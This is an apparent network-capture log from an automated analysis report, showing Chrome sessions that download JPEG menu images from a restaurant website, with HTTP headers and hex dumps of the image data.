                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: d5 c6 6d 9d 72 83 41 98 73 2e 37 a3 be 91 74 cb bf 7d 6a 0e 62 24 e5 8b fd 47 d4 f4 4f 7c dc fa 96 8b 74 0c 3d 7f 28 5b 66 33 ad c3 47 ff 00 e3 ce d1 32 9c ee 9d 56 a9 e6 20 8f 27 00 4f 4b 72 2d 5f f2 63 40 d8 13 e9 a9 14 eb 0c 64 76 bc 86 ed 9f 59 7c 1f ba a1 b5 f8 93 a5 88 ba 6a eb 81 de f6 28 c9 0e e1 27 52 2e 14 67 ec b5 09 74 e9 09 ca 2d d3 46 58 da 32 ca 74 b2 1c c7 b5 52 c5 b7 84 b3 42 6c e4 75 47 77 9a 8c 84 df 75 b8 42 be 7b 0f d9 ea 1d 55 5e c7 b7 49 13 cd 13 44 91 85 dc 73 69 20 db 4f 2b 7f 12 92 05 84 4d b9 88 5a 29 c0 1a 2d 7e 68 d7 b7 f6 69 c9 51 34 d1 2a c5 11 d6 ab 19 21 81 b6 8d 5a bb 74 76 fb c9 15 99 81 01 22 16 72 5b fe 9a 51 97 e1 b2 31 68 fe e2 41 7b 8b f6 5a a4 5d c4 2c 63 52 55 e3 0d a4 9f 7a 85 c6 b8 a3 05 56 10 05 94 37 26 a6 5e
                                                                                                                                                    Data Ascii: mrAs.7t}jb$GO|t=([f3G2V 'OKr-_c@dvY|j('R.gt-FX2tRBluGwuB{U^IDsi O+MZ)-~hiQ4*!Ztv"r[Q1hA{Z],cRUzV7&^


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    94192.168.2.449860162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:51 UTC644OUTGET /assets/imgs/res_menu2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:51 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:51 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 87549
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:51 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: ff d8 ff e1 24 8a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 32 3a 32 32 3a 32 32 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: $ExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 12:22:22
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: 9f d5 f7 f4 ee b3 6e 66 57 4d 6f d9 ba 83 ce ec cc 2b 1f 34 3d e4 b9 ff 00 69 c5 b9 cc b2 da dd bb e9 d7 fc d5 5f cd fe 85 68 3f a4 75 20 18 df b0 bc fb 83 f7 35 d5 92 d7 0d 7f 9c f5 1d bb fd 0f fc 5a e5 8f 4e 6b 33 9b 6e 1b 8f 4d b6 96 17 30 56 f9 97 88 3b 49 8f 76 d7 3f 6f b7 fc 1f fc 1f e8 97 41 d3 fe be 1c 50 1b d7 40 a6 b6 00 2c c8 68 25 db 8c 68 68 a4 3f 7f ef 7e 87 fe 31 4f 1c 7c b7 35 20 64 25 1c 95 c4 78 48 1c 5d af e6 6b 64 97 31 cb 46 e2 63 3c 7b 0e 2b e2 8a 2d d9 19 75 df 9e e6 d7 e8 50 e0 cb 6b bb 76 ea 8b f7 7e 96 f6 6d f6 55 f4 3f a9 fe 91 60 75 3c 57 d3 5b af c1 b4 53 46 25 46 a6 48 de 08 92 eb ad b6 97 ee fd 55 cc de ca 5f fc e7 a7 fe 91 7a 4e 1f 55 e8 fd 5f 1d f5 56 e6 58 cb ab 26 ec 6b 5b b5 c6 bb 3f 46 ff 00 5a 87 8f 7d 76 7d 07 2c db
                                                                                                                                                    Data Ascii: nfWMo+4=i_h?u 5ZNk3nM0V;Iv?oAP@,h%hh?~1O|5 d%xH]kd1Fc<{+-uPkv~mU?`u<W[SF%FHU_zNU_VX&k[?FZ}v},
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: 54 d9 f8 c0 c7 8d 97 fe 45 5d e2 27 82 0e 8e 6c 66 ce 81 c3 9b c8 c6 b1 db 66 35 e6 c7 1c e8 fc 83 47 6e 55 78 82 41 c7 43 8e 78 8e 67 0b 6f 00 27 15 75 88 9b cd 0d 24 6a aa 06 c7 11 a9 11 9f 39 b2 9f 99 f3 e5 7c 27 7f f1 2a ec a2 7a 6c 67 8c 04 e6 c6 c9 18 73 58 4b 6b f8 55 d2 89 08 ce 0c c7 e3 c6 60 b9 cc b0 3f 89 32 e3 37 86 3b 2a 84 e0 5c 0b 8a 06 8f 83 13 f3 04 6f 0e 8e 71 1b 92 38 e4 c9 23 e2 7f e2 55 de 46 99 e4 1f 4d 78 d6 6b 59 e3 37 9b cd 0d 84 e5 85 b8 e0 55 7c 32 3a 01 27 2c 2e a3 23 3b 0e 01 56 8c 29 94 e2 e8 10 54 e6 c0 1c fc a3 12 24 e2 31 a4 27 12 cb 2e 47 f9 a3 15 d7 b6 48 a0 e1 aa 8d 1b c6 c8 7f cc 29 38 89 e3 7a c2 c3 7e a0 9f 43 ea 74 a1 67 d6 6e 36 05 3c f3 da 98 86 6c 8c 8d 8b 61 62 0b 48 74 a9 86 0d 84 8d 8b 24 21 47 00 4b 44 49 9e
                                                                                                                                                    Data Ascii: TE]'lff5GnUxACxgo'u$j9|'*zlgsXKkU`?27;*\oq8#UFMxkY7U|2:',.#;V)T$1'.GH)8z~Ctgn6<labHt$!GKDI
                                                                                                                                                    2024-10-01 04:26:51 UTC16336INData Raw: dc 08 40 09 1d ed 21 ca 81 66 fe 09 9d 50 e9 62 01 f5 26 54 29 8d 42 a1 a6 e5 83 ad ce 99 c1 54 a7 6a 6d e5 39 1d a0 e9 60 b3 1a 77 73 2c 5c 6f 40 00 e8 93 5e ef 2a 2d 23 07 52 10 3c 26 cb 65 cd fd e9 89 b8 6d 88 ca a4 0b 13 49 1e 9f 04 55 37 22 27 c2 ff 00 2a 70 5c 7f 09 d2 9c 17 54 4d 20 ea 84 7b 56 60 ca 85 9f 72 60 3d ba 2e 34 01 30 c1 31 0e 9f 95 11 07 82 0e 6e f5 e5 46 24 0c dc d1 cc 80 76 38 69 12 c2 7c 2e ae 0f dd 6f cc 87 4e df 89 00 39 46 c4 f2 1f c9 00 1f ff 00 0b 38 b5 50 aa 69 a7 a1 a2 db a9 44 c9 8e 3a 59 39 a7 66 8a d7 51 dc db 3e 16 e4 9a ab 99 33 5c 65 f5 27 62 7b 5b 8d 57 dc b2 8a a1 41 5d 88 54 8a 70 f2 26 2b fc 32 8e 5b ad 8f 5c 6d e1 f3 15 b2 8e 78 54 d2 96 f5 46 4b a6 27 19 3f 02 ab 08 8f b5 02 69 5e 6e d5 1e 1a f3 14 44 0b 4b 72 0e
                                                                                                                                                    Data Ascii: @!fPb&T)BTjm9`ws,\o@^*-#R<&emIU7"'*p\TM {V`r`=.401nF$v8i|.oN9F8PiD:Y9fQ>3\e'b{[WA]Tp&+2[\mxTFK'?i^nDKr
                                                                                                                                                    2024-10-01 04:26:51 UTC48INData Raw: b7 70 60 a2 ba 93 3d 9d 2a df 00 dd e5 84 80 31 45 e2 1d 3e 1a f5 b5 57 ac 25 ce 41 63 4d 5e 16 ed 16 04 4b b0 c4 83 3a 7c 6b bf 59 46 ee b8 2a
                                                                                                                                                    Data Ascii: p`=*1E>W%AcM^K:|kYF*
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: 44 8e ac 1e 0d d1 db a5 41 02 d1 20 88 86 8c 34 ee 7d 9e aa b7 72 c1 d6 49 01 a7 cf f1 d1 3a 34 32 e0 68 0e 90 07 c7 e9 57 31 6f 85 2d 39 0c 13 01 22 9e ef 2e 86 e8 4c 24 92 06 ae b2 f5 ee 5d a1 fb c4 dc 03 2b 6a 21 17 e8 76 fe d2 80 b6 30 81 0e 70 02 78 d5 a7 b3 42 ea dd d6 49 d2 ba 84 01 e6 f4 6b 98 b2 c4 6b 10 2d 9c d3 ed 55 59 3d ee 9f 79 4b ca eb 17 74 43 6a 1d 24 75 eb 1d d0 46 03 38 14 a3 57 19 c4 6c 3f 1f 62 8e 88 82 61 85 41 10 46 14 ea 48 b7 cd 36 66 e9 25 1e 0c a7 82 cb ec 9f ec bd e5 28 c1 12 64 b0 92 23 b1 67 eb 75 d0 64 5d 32 61 42 e0 ac 67 4f e4 d3 d9 61 eb 56 0b 96 c0 8f 35 11 71 4e 86 00 93 d1 3b ab 9d 1b 61 b7 70 24 0f ca a0 57 4a 86 04 20 19 cd 3b 0d 3a 06 f0 27 1c bb b5 6d ae a8 54 6c 43 80 02 c7 0f 0f 6d a9 56 d3 2a b1 30 3a 4f 76 3e
                                                                                                                                                    Data Ascii: DA 4}rI:42hW1o-9".L$]+j!v0pxBIkk-UY=yKtCj$uF8Wl?baAFH6f%(d#gud]2aBgOaV5qN;ap$WJ ;:'mTlCmV*0:Ov>
                                                                                                                                                    2024-10-01 04:26:51 UTC5629INData Raw: a3 eb 9f ed 2e f9 70 c0 f4 d1 04 86 07 8a 31 c2 95 92 15 86 1d 2a c3 fb 54 34 6e b0 c0 03 94 d6 70 08 e0 8c 0c 74 56 f6 0d 96 93 f9 cb 44 8d 98 1f 3f d2 a0 42 95 88 02 31 fa 54 64 48 f3 d6 a2 bb c3 29 ca a0 0d 3b 48 ce 6a 3f 05 15 b8 01 53 9a b4 10 6b 57 22 f0 36 d8 b8 65 7f 67 73 ab e8 5c af 02 f2 9e 5f 98 ec 3e 1a bb c8 7f 53 ca 6c df b6 2e db 39 ab 09 fc 5e c5 1b 9f c3 6e 4a e6 79 7b 87 1f d8 de ff 00 9b 5f ba f8 2f fb ce 5e 0e 93 ae 90 da b3 e3 10 65 ba 72 ec f5 aa ed b9 5b 3a d4 f8 41 cc 37 8c 38 17 47 05 bf 13 82 ad 0b 88 51 ed b0 d4 ac 20 89 dd a6 1c 20 13 1f 25 5b 00 18 e9 8c a6 9e d9 60 83 c5 39 c0 81 34 6d 72 be be ea 80 03 0f 66 b8 66 cd ef 7e 85 35 db c5 df 99 65 d3 a8 a8 61 e8 85 f7 36 ad af 07 85 4c 11 a6 df 13 ac c6 23 b9 4d 74 b4 02 31 04
                                                                                                                                                    Data Ascii: .p1*T4nptVD?B1TdH);Hj?SkW"6egs\_>Sl.9^nJy{_/^er[:A78GQ %[`94mrff~5ea6L#Mt1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    95192.168.2.449865162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC644OUTGET /assets/imgs/res_menu3.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:52 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Fri, 29 Sep 2023 22:07:40 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 370443
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: ff d8 ff e1 23 af 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: #ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:52 UTC8192INData Raw: 54 fd 8c 7b ff 00 7f fe 2f d5 57 be b6 fd 58 7f d6 00 cc 8a 5f 5d 59 f5 0d 9e a3 81 02 ca c1 2e 15 5a cf e4 39 ce f4 ec 6a c9 a3 ea bd dd 37 12 2d 7e db 2e d2 c0 c2 e0 43 67 63 dc e8 63 ea f7 52 ed 9f 4f e8 7f db 6a bf 35 87 8b 53 74 0f 4f dd fd 28 f1 32 e2 c9 1a 8e 83 88 7e 7f bc d6 aa cc bb b3 b2 72 6e fd 7e ac 87 b1 b9 04 97 38 39 cd 2e 66 ca 29 bb d1 dd e8 ee dc c6 3f fc 37 a7 fa 15 b3 fb 3f 0b 22 e1 45 d5 7a 55 e4 b2 db ed aa fa c7 ab 5b 88 15 ba b6 38 9d f5 66 37 d5 fa 4c d9 57 a9 5f fc 62 1e 6d bd 31 b5 e3 60 d6 c6 f4 fc 2d c5 ae b4 d6 03 e4 3b e8 b6 d7 7e 91 8e bb 73 6c be f7 fe 67 fa 45 3c 87 d4 71 ea 38 e7 6e 2e e2 c6 ba 82 6f 3b 59 a5 d9 17 e5 b8 39 df a3 73 bd 98 ff 00 4f 27 fe 21 30 63 11 d0 00 78 45 0f 2f dd fe ea ef 70 e9 bc 6c ff 00 23 fd
                                                                                                                                                    Data Ascii: T{/WX_]Y.Z9j7-~.CgccROj5StO(2~rn~89.f)?7?"EzU[8f7LW_bm1`-;~slgE<q8n.o;Y9sO'!0cxE/pl#
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c 5c 0c 75 0c 8e 0c a7 0c c0 0c d9 0c f3 0d 0d 0d 26 0d 40 0d 5a 0d 74 0d 8e 0d a9 0d c3 0d de 0d f8 0e 13 0e 2e 0e 49 0e 64 0e 7f 0e 9b 0e b6 0e d2 0e ee 0f 09 0f 25 0f 41 0f 5e 0f 7a 0f 96 0f b3 0f cf 0f ec 10 09 10 26 10 43 10 61 10 7e 10 9b 10 b9 10 d7 10 f5 11 13 11 31 11 4f 11 6d 11 8c 11 aa 11 c9 11 e8 12 07 12 26 12 45
                                                                                                                                                    Data Ascii: j{+=Oat2FZn%:Ody'=Tj"9Qi*C\u&@Zt.Id%A^z&Ca~1Om&E
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: c6 75 09 dc ed 6e c9 6a 46 cd 5e 87 1d ef ba 74 6a 01 41 6f 6d 6e 43 36 a0 40 af 5c 3a 36 02 9d 18 84 1d ad a6 42 48 c8 f5 c3 c4 81 51 2d 17 e8 6f ee ed 5d 4a b3 50 63 88 08 83 11 b2 9b 6d 7c a6 55 28 25 3f 89 ef 88 72 15 4b 71 84 d5 93 b5 72 68 1d 54 eb a3 1e d8 60 9b ee b3 ae c2 23 65 32 b7 e4 10 30 c9 fa 78 1c f1 d2 62 aa 7b 44 22 91 6f 70 b1 14 60 3c 7c 8e 14 60 84 0d 51 6b 7d d6 27 20 16 15 1d ab 8e 11 5d 28 82 8e da df 8c 88 7a 37 5a 57 b6 1a 0b 24 9a 91 06 dc 0d 3e e0 01 c3 44 92 f8 21 ef 74 59 89 af d3 c3 02 75 53 b2 e7 de 6f e6 fd f8 16 52 eb ff d7 f9 f3 04 a1 a3 a9 fe 11 42 2b df 1e 45 8a fa cd 72 25 0b bc 94 54 69 ce a2 a6 9d b0 c0 ad c1 30 09 ab eb d6 87 04 ea cc 0a 70 b0 77 a5 3c 71 dc 99 38 04 a1 43 90 a6 21 d1 b2 93 6d 90 87 4d 06 b8 28 4b
                                                                                                                                                    Data Ascii: unjF^tjAomnC6@\:6BHQ-o]JPcm|U(%?rKqrhT`#e20xb{D"op`<|`Qk}' ](z7ZW$>D!tYuSoRB+Er%Ti0pw<q8C!mM(K
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: b2 93 35 e2 d1 4e 59 9c 43 2e e4 e9 ec 56 b7 13 1a 47 04 8e 7b 00 a7 1d c4 ae 36 c4 75 52 1b 0e 27 bf de 30 16 db 4d cc a5 8f 45 8c d3 13 18 14 b9 e4 44 0d d5 9f b1 fc 1b f2 36 f8 51 6d 78 fc f1 ab ff 00 1b ad 29 5c 3f d8 94 b6 0a a4 b3 20 3a ab a7 8e fe 8a b9 de f4 d1 b6 e3 20 b3 46 22 a8 01 27 3c 1c 70 26 55 73 e5 5b 60 b4 4f 17 fd 00 d8 46 23 93 74 9e 6b b7 19 b0 22 80 e2 d4 7c 6f 75 5e 7e 4e 72 ea ad bb 6f d1 8f 0a db 63 1a f6 d5 62 32 24 80 7f cb 0f 18 10 0a b9 cd 99 ea 86 ee 5f a4 de 10 e8 57 fb 72 2f 9d 07 fa 63 a5 83 5f 64 43 26 5d d5 59 be fe 8c 78 ed c8 93 f2 9a a0 63 f6 e9 3d 30 89 78 f8 9d 95 88 66 cc 75 54 c6 fb fa 2c dd ed b5 3e db 7c e6 99 84 61 5e 98 af 3f 1b 21 b1 56 63 e4 a5 b1 55 2e ef fa 62 f9 1f 6c 0e d1 5a 8b a5 5a d2 80 81 8a f2 c2
                                                                                                                                                    Data Ascii: 5NYC.VG{6uR'0MED6Qmx)\? : F"'<p&Us[`OF#tk"|ou^~Nrocb2$_Wr/c_dC&]Yxc=0xfuT,>|a^?!VcU.blZZ
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 83 a8 9e e5 bb d1 5c 6a cb c4 60 25 26 46 22 c8 2e cc 1a e6 e1 ee 18 d5 41 c8 fd 30 91 a9 4c 2a 41 2c 0d 73 2b 0a f5 e9 82 21 d4 0d 14 a7 8d 6e ad b6 4e b6 f2 b6 81 5f 4d 7f d7 1d 12 62 50 cc 72 0b 43 6c 1b d2 4a 23 29 28 27 22 31 72 12 75 4e 60 aa 43 f5 27 f0 1e d7 f2 ef 18 b8 b9 b5 84 43 bb da 83 35 bd c2 01 ae 29 40 c9 87 88 3d c6 23 2b 1a 39 30 ff 00 b8 26 63 e4 4e 99 72 8a f8 57 c9 78 ee f7 c4 37 ed c3 8f 6f f6 cd 67 b8 ed b2 18 e6 43 50 ae 3f 85 d0 9e a1 b1 e6 67 5c a2 58 8d 42 f5 98 f9 02 e8 f2 8a 16 b7 35 05 3a d3 ae 03 50 ac 04 ac 71 7b b2 03 d6 a7 2c 73 ae e4 ca d5 e2 5b 17 bd ed b1 fb 43 0a b7 7f 3a 60 c4 49 4a b2 e0 16 c1 f8 fe cd ec 66 49 61 56 28 34 e4 a4 81 51 d0 e1 b0 8a ad 3b 09 5a 70 ef c5 ac 53 54 2d 0d dc 6a 34 48 32 57 f2 6c 59 8e a1
                                                                                                                                                    Data Ascii: \j`%&F".A0L*A,s+!nN_MbPrClJ#)('"1ruN`C'C5)@=#+90&cNrWx7ogCP?g\XB5:Pq{,s[C:`IJfIaV(4Q;ZpST-j4H2WlY
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 6b 64 25 8c 06 d2 3d 22 95 c4 62 06 2c 55 ef 1f 61 84 99 52 f3 6e 77 b2 3b 1f 68 fb 74 20 01 db 17 2c ad d7 a4 84 e4 c8 0a dc 5d cf 23 06 d4 0d 68 43 61 43 1d 74 af 64 e1 6d 25 6c c9 c3 a3 58 8e eb 85 c4 ae 85 b4 95 34 35 1f e7 88 91 8a 74 26 52 44 cb 6e d5 0e 7e 98 af 38 46 4a dd 77 90 a4 3b 67 24 b9 b3 65 01 ca 80 7a d7 19 d7 e1 03 b2 bd 0c 81 2d d6 8b f8 cb e4 0b c7 be 8b 6b 59 e7 92 0b c6 52 d6 88 cf a1 9c 7d a5 90 1a 1a 79 8c 50 81 b3 16 c0 46 c8 32 f1 ea b2 04 95 f4 67 85 70 ad cb 7b 8e de 69 ad de 18 a4 01 b4 90 41 23 1e e3 1a b9 59 10 48 65 e0 b2 6e 8c 24 40 d5 6b 5e 23 c0 60 b2 48 95 2d c1 7c ab 97 7c 6a d7 50 8a ca 9d c4 ab df 6a d8 20 b3 8d 5e 50 00 51 9d 7c 30 f0 12 43 94 33 7b e5 11 58 a3 d9 ed c7 53 d0 86 93 b0 c4 c6 3c 76 52 64 fb 2c 7f f3
                                                                                                                                                    Data Ascii: kd%="b,UaRnw;ht ,]#hCaCtdm%lX45t&RDn~8FJw;g$ez-kYR}yPF2gp{iA#YHen$@k^#`H-||jPj ^PQ|0C3{XS<vRd,
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: c7 e6 a4 dc 77 cb db ab 8d c6 fa d8 d4 2d bf be 29 fd 46 27 d4 40 cc 9e e7 2c 7a 7f 25 e4 04 69 18 d5 c8 d9 77 23 39 47 61 11 b6 a7 b0 dc 9e fa 2f 9c 62 e2 3d 9c 80 11 ac 00 01 ee be 65 fe b9 b9 26 fb 69 f1 dd 95 9c 1b 94 96 89 c8 f7 b8 ed 6f 56 de 42 be f5 b4 70 bc 8d 0d 46 65 58 d0 bf 8e 58 ef b5 30 e3 2c c3 3b 1a 72 8c 5c 1d c0 3d c7 f3 57 fc 96 49 86 37 1a c9 88 24 0e c4 ff 00 4f e0 be 69 71 5b f3 b5 5f ed f7 0c 69 02 4c 0c 8a 7a 28 e8 08 fa 63 de 66 57 ee 40 81 ba c8 c1 b4 d7 31 d9 6a 69 b7 88 6e 2d 6d ee 2d 61 73 73 6d 11 fc b6 e1 69 2f fd 42 fa 29 14 6c 8e 34 3c 4a 7e e1 f7 1a f5 c6 2c 2e aa 71 e1 7c 1f d4 16 90 ec 16 c7 f8 f7 d7 2e 74 cf ae a0 87 89 fe a8 76 ed f3 8f 2d b7 b1 bc b2 db 38 ce d9 c7 af 9a 01 1d e5 ed 9c 7a 65 98 2a e9 c8 9f 5d 1b ee
                                                                                                                                                    Data Ascii: w-)F'@,z%iw#9Ga/b=e&ioVBpFeXX0,;r\=WI7$Oiq[_iLz(cfW@1jin-m-assmi/B)l4<J~,.q|.tv-8ze*]
                                                                                                                                                    2024-10-01 04:26:52 UTC8192INData Raw: 48 ea 37 5e 92 54 c4 01 d8 ec 8d 72 5e 1f c7 79 4e c5 26 d9 b8 bf f4 6f 83 c5 79 09 5d 09 18 29 a9 27 04 65 fd 36 cc 77 cb cf 16 7c 7f 93 b3 1e c1 20 7f 15 8b e4 3c 77 bd 13 02 1c 2a 57 68 f8 8b 84 ed bf 97 69 76 d7 df ae 6c ce 57 77 d2 12 8c c3 25 71 10 a2 e9 f0 ae 36 2e f3 d9 16 38 07 88 f4 fe 6b b1 fe de c3 a8 44 98 f2 90 ff 00 51 fe 0a 64 f6 56 bb 7c 1e d4 46 de ce 82 9f 97 b7 8c 2e 9a 76 f4 8e 98 cb 95 b2 9e e5 ca dd a6 02 3a 44 30 40 66 be b7 59 1b 55 cb 82 7e da d7 fd 71 c6 0e ae c4 94 e2 d3 73 85 5d 0a de a6 a1 d4 31 a0 fd f8 4c ea 71 b2 b1 12 ca cd d8 2f 4c e6 49 1d 95 d2 05 05 dd 5c 54 d7 2c a9 d7 19 b6 d7 c4 b8 45 3d 40 df 55 64 d9 db 59 1b 68 ee 2c e5 32 34 b5 f7 15 85 15 29 d0 0f 12 70 89 08 ca 20 c4 eb d5 20 89 89 71 90 d1 3c 9e ce d2 ea 19
                                                                                                                                                    Data Ascii: H7^Tr^yN&oy])'e6w| <w*WhivlWw%q6.8kDQdV|F.v:D0@fYU~qs]1Lq/LI\T,E=@UdYh,24)p q<
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: b7 65 bf b1 31 4b 6b 6b 74 e5 e8 d5 53 9f 5c 65 65 64 40 16 05 6b e1 e3 4e 51 79 47 e0 8f 58 6e 0f 61 79 1c 4c cc 4c 87 4d 17 36 24 e3 2e c3 cc 34 56 91 80 8e b2 0a 6d 7d 66 e8 ab 23 29 05 85 68 dd 71 91 65 56 42 4d 25 76 8c 98 4c 7d 29 9e d3 c5 b7 4e 55 73 73 67 b3 b4 0d 73 6f 1f b8 c9 33 e8 14 39 0f df 8d 2f 1d 8b ef 58 dd 06 e9 5e 4b c8 7f 8f 53 8d ce ca ac e5 5c 33 95 71 56 92 ef 76 d9 e6 96 4a b0 97 4a 96 89 73 c8 ea 1d b1 ec 62 44 46 81 78 93 61 b0 ea 75 55 4d a6 d7 ba 6f 97 ab 0d ad b3 bb 4c f4 67 0a 68 30 9b 2e 84 03 92 ac d5 44 ed 2d 11 f3 e8 16 db f8 be 2d c3 63 e3 d3 71 2d e2 cd a6 8e d6 d9 bf 23 78 c0 55 63 7f 56 9a 1e 87 51 eb 8c 4b e5 39 19 48 c7 49 0f c1 7a 0c 61 18 c6 30 8c b5 8f e6 80 ef bb 30 bc b4 b8 8e 32 a2 57 52 11 17 f9 87 40 4f 9e
                                                                                                                                                    Data Ascii: e1KkktS\eed@kNQyGXnayLLM6$.4Vm}f#)hqeVBM%vL})NUssgso39/X^KS\3qVvJJsbDFxauUMoLgh0.D--cq-#xUcVQK9HIza002WR@O


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    96192.168.2.449863162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
